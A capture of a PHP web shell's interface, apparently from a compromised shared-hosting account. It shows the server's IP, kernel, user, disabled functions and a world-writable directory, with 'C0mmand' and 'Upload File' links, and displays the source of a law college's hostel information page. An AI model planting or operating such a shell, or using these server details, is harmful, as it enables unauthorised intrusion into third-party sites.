|
Server IP : 2a02:4780:3:2287:0:3736:a38e:8 / Your IP : 216.73.217.135 Web Server : LiteSpeed System : Linux sg-nme-web2187.main-hosting.eu 5.14.0-611.54.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed May 6 18:03:03 EDT 2026 x86_64 User : u926327694 ( 926327694) PHP Version : 7.4.33 Disable Function : system, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF Directory (0777) : /home/u926327694/domains/svschool.in/../jsssakrilawcollegehubli.in/public_html/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php
include"header.php";
?>
<!-- Start Hero Area -->
<section class="hero-section height-470 bg_dark_9" style="background-image:url(assets/images/about_us.png)" data-aos="fade-up">
<div class="hero-area">
<div class="container">
<div class="row">
<div class="col-md-12">
<div class="page-hrader text-white text-center">
<h1 class="display-3">Hostel Details</h1>
<div class="page-breadcrumb">
<p><a class="text-white" href="index.php">Home</a> - Hostel</p>
</div>
</div>
</div>
</div>
</div>
</div>
</section>
<!-- End Hero Area -->
<!-- Start Author Intro -->
<section class="intro-section section-ptb bg_dark_9" data-aos="fade-up">
<div class="intro-area">
<div class="container">
<div class="row">
<div class="col-sm-12" >
<div class="half_column_content">
<a href="#"> <h3>Hostel Facility</h3> <a></a>
<img class="mx-auto d-block" src="assets/images/HostelFacility.jpg" alt="team member" class="img-fluid" >
<p class="text-justify"> <b>
Our college does not have its own hostel premises in same campus and to fulfill this requirement of students, we have made MOU with our parent institution, JSS, Vidyagiri, Dharwad and it has earmark. 15 rooms for the Female students in Sonutai Kabbur Hostel in Dharwad, 15 rooms for the Male students in Keshavadas hostel in Dharwad
</div>
</div>
</div>
</div>
</div>
</section>
<!-- End Author Intro -->
<?php
include"footer.php";
?>